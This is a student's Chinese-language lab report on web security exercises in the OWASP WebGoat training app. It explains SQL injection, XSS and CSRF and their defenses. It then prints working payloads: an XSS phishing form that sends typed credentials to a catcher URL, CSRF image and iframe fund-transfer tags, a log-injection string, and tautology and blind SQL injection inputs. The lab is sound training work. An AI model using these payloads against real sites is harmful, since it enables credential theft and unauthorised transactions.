20155223 Exp9 Web安全基础实践

20155223 Exp9 Web安全基础实践

基础问题回答

SQL注入攻击原理，如何防御？

• 攻击原理：SQL注入即是指web应用程序对用户输入数据的合法性没有判断，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息。
• 防御手段：
  • 在数据库设置防火墙，专注防御SQL注入攻击。
  • 不再使用动态拼接SQL语句，可以使用参数化的sql或者直接使用存储过程进行数据查询存取。
  • 用加密方式或Hash函数来存储机密信息。
  • 少给或不给应用的异常信息提示。

XSS攻击的原理，如何防御？

• 攻击原理：XSS攻击是Web攻击中最常见的攻击方法之一，它是通过对网页注入可执行代码且成功地被浏览器执行，达到攻击的目的，形成了一次有效XSS攻击，一旦攻击成功，它可以获取用户的联系人列表，然后向联系人发送虚假诈骗信息，可以删除用户的日志等等，有时候还和其他攻击方式同时实施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼，它带来的危害是巨大的，是web安全的头号大敌。
• 防御手段：
  • 限制可输入字符的范围和可输入字符串的长度。
  • 在表单提交或者url参数传递前，对需要的参数进行过滤。

CSRF攻击原理，如何防御？

• 攻击原理：一种对网站的恶意利用也就是人们所知道的钓鱼网站。尽管听起来像跨站脚本（XSS），但它与XSS非常不同，并且攻击方式几乎相左。XSS利用站点内的信任用户，而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比，CSRF攻击往往不大流行（因此对其进行防范的资源也相当稀少）和难以防范，所以被认为比XSS更具危险性。
• 防御手段：
  • 严格设置cookie的域，一个cookie最好就对一个域负责。
  • 页面链接最好不能出现用户的隐私信息。
  • 采用验证码等手段来认证用户。

实践内容

WebGoat

WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台，用来说明web应用中存在的安全漏洞。WebGoat运行在带有java虚拟机的平台之上，目前提供的训练课程有很多，包含了XSS、线程安全、SQL注入等。本次实验就用这个东西来练习。

首先确认Kali机内有Java，输入命令：java -version以确认虚拟机的确有Java环境。

好的，我的虚拟机里有Java环境。如果没有此环境，可以按照这里搭建环境。

然后输入命令：sudo apt-get install default-jre 来安装默认设置的jre。不过我的已经安装好了。

最后下载并安装WebGoat。

wget https://s3.amazonaws.com/webgoat-war/webgoat-container-7.0-SNAPSHOT-war-exec.jar
java -jar webgoat-container-7.0-SNAPSHOT-war-exec.jar

必须注意的是，下载网站不能用校网相连，因此必须使用外网。

XSS攻击

Phishing with XSS

跨站脚本攻击可以通过HTML注入劫持用户的浏览器，任意构造用户当前浏览的HTML内容，甚至可以模拟用户当前的操作。我要用这个攻击方式来获取用户名和密码。

首先编写一段网页代码：

<head>
<body>
<div>
<div style="float:left;height:100px;width:50%;background-color:green;"></div>
<div style="float:left;height:100px;width:50%;background-color:red;"></div>
</div>
<div style="background-color:blue;height:200px;clear:both;"></div>

</div></div>
</form>
  <script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.！！！！！！ Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
  </script>
<form name="phish">
<br>
<br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>

然后点击search，出来这个玩意儿：



输入完用户名和密码，你就没了。

Stored XSS Attacks

此类攻击就是创建一个非法链接，让用户得不到他们想要的信息。



然后点击生成的链接。

反射型XSS攻击

反射型XSS攻击是指一种非持久性的攻击，攻击触发条件就是受害者的点击。此类攻击常见于搜索引擎。

在此框输入一个命令：<script>alert("Attack by suhuang?");</script>。

点击。

CSRF攻击

CSRF攻击是伪装成网站受信任用户的请求来发起攻击，可以用于防范此类攻击的手段和资源很少。

基础型CSRF攻击

查看页面右边Parameters中的src和menu值。

Title框就随便输入点什么就行。

下一个框就输入命令：<img src='attack?Screen=src值&menu=menu值&transferFunds=转账数额' width='1' height='1'> ，然后会生成一个链接。一键吃鸡！

如果它能告诉我这转账金额去哪，我会更高兴。

CSRF Prompt By-Pass

与上面的攻击一样，不过输入的代码有两行。

<iframe src="attack?Screen=src值&menu=menu值&transferFunds=转账数额"> </iframe>
<iframe src="attack?Screen=src值&menu=menu值&transferFunds=CONFIRM"> </iframe>

同样是去点击就可以爽一下的链接就能成功攻击。

诶，它告诉我转账数额去哪了！

SQL注入攻击

这个上个实验已经做过了，就是利用编程者没注意到的一些SQL语句漏洞来发起攻击。主要是通过输入一些SQL执行语句进入网页，让网页的SQL命令来执行。

命令语句注入

这个题是要求能够在目标主机上执行系统命令，我们可以通过火狐浏览器下的一个扩展Firebug对源代码进行修改。

我添加出来的这个命令可以直接查看主机的端口信息。

麻烦哪位神仙大佬能跟我说说那一串Unix是个什么鬼。

永真式注入攻击

就是利用永真式进攻来获取一些数据权限。

我想看看纽约的天气数据，那么就在网页代码上的纽约位置值后面输入个or 1=1就行。

那个戴维营和极地考察站是怎么一回事？

登录界面注入

输入的用户名一定会被追加到日志文件中，所以要用障眼法来使用户名为“admin”的用户在日志中显示“成功登录”。

输入命令：shyl%0d%0aLogin Succeeded for username: admin 。

为什么这结果有种似曾相识的感觉？

流SQL注入

就是还是用永真式来注入攻击，攻击获得网站存储的机密数据。

盲SQL流注入

这种攻击和上一种攻击不同。上一种攻击是目的明确的，而这个攻击就是胡乱进攻，然后通过反馈来得到信息。

在输入框中输入这一串：101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='5223522352235223'), 1, 1) = 'h' );。

里面数字是ASCII字符值。

除非我能一次性输入到正确的字符代码，否则我根本就是瞎搞。

哼，概率！

出结果已经是次日，结果得个鸡儿Jill哟！

实验感想

这个训练用的程序不错，不知道Windows下有没有相关的东西。